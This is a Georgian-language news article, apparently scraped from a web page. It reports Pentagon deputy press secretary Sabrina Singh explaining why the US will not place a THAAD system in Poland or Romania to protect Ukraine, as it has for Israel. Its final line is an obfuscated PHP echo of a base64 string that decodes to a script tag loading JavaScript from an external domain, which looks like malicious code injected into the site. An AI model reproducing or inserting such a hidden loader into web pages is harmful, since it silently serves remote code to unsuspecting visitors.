celsiusi
ავერსი საქკაბელი

 პენტაგონის პრესსპიკერის მოადგილის, საბრინა სინგის განცხადებით, შეერთებული შტატები რუსული რაკეტების და უპილოტო საფრენი აპარატების ჩამოგდების მიზნით უკრაინის სიახლოვეს THAAD-ის ანტისარაკეტო სისტემის განთავსებას არ გეგმავს, როგორც ამას ისრაელისთვის აკეთებს.

პენტაგონში გამართულ ბრიფინგზე საბრინა სინგს დაუსვეს შეკითხვა, თუკი შეერთებული შტატები აგზავნის THAAD-ის სისტემას ისრაელში, ირანიდან თავდასხმების შესაჩერებლად, რატომ არ შეიძლება იგივე გააკეთოს უკრაინისთვის - განათავსოს THAAD-ი პოლონეთში ან რუმინეთში, რათა ხელი შეუწყოს უკრაინაში მშვიდობიანი მოსახლეობის დაცვას. ამ შეკითხვაზე პასუხის გაცემისას სინგმა უპასუხა, რომ ეს არის ორი განსხვავებული სიტუაცია.

„განსხვავებული შესაძლებლობები, განსხვავებული ომები, განსხვავებული რეგიონები. ასევე განსხვავებულია ვალდებულებები ისრაელისა და უკრაინის მიმართ“, - აღნიშნა პენტაგონის წარმომადგენელმა.

ასევე, მან ხაზი გაუსვა, რომ შეერთებული შტატები აგრძელებს უკრაინის მხარდაჭერას.

„არ მინდა გავაკეთო იმ ყველაფრის მთელი ჩამონათვალი, რასაც ჩვენ უკრაინას, ან ისრაელს ვაწვდით, მაგრამ რაც შემიძლია გითხრათ არის, რომ ეს ადმინისტრაცია, ეს სამინისტრო აგრძელებს ორივეს მხარდაჭერას სხვადასხვა საჭიროებებში, რაც მათ სჭირდებათ“, - აღნიშნა პენტაგონის წარმომადგენელმა.

73
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");